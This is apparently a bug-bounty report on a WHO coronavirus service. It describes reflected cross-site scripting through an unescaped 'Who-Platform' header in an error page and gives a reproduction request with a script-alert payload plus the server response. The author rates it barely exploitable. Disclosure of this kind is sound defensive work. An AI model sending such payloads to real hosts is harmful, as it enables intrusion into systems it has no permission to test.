Probably unexploitable XSS via Header Injection

## Summary: The `Who-Platform` header is reflected in the output of the page if it's not one of the recognized `Who-Platform` values (IOS, ANDROID, WEB). While this is probably no longer exploitable (as of ~2015), it may be exploitable on less well implemented browsers (not Chrome/Firefox/Edge). In general, though, this is bad form and should probably be corrected. ## Steps To Reproduce: Send the following to `hackerone.whocoronavirus.org` ``` POST /WhoService/getCaseStats HTTP/1.1 Host: hackerone.whocoronavirus.org Who-Client-ID: ██████ Who-Platform: test1<script>alert(1)</script> Content-Length: 0 ``` Observe the response containing an XSS payload. ``` HTTP/1.1 400 Bad Request Content-Type: text/html;charset=utf-8 X-Cloud-Trace-Context: 587c4577619ec099323490092d00ca47;o=1 Date: Wed, 01 Apr 2020 04:14:02 GMT Server: Google Frontend Content-Length: 302 <html><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <title>400 Unsupported Who-Platform header: test1<script>alert(1)</script></title> </head> <body text=#000000 bgcolor=#ffffff> <h1>Error: Unsupported Who-Platform header: test1<script>alert(1)</script></h1> </body></html> ``` Exploitation of this kind of XSS vector *_was_* possible using flash but somewhat recently a security upgrade prevented flash from being able to set arbitrary custom headers in cross origin POST requests. ## Supporting Material/References: ██████████ ## Impact Very very limited XSS. This probably moreso falls in the "Media could be a stickler about this" but it also could affect real world participants on out-of-date browsers or out-of-date version of flash.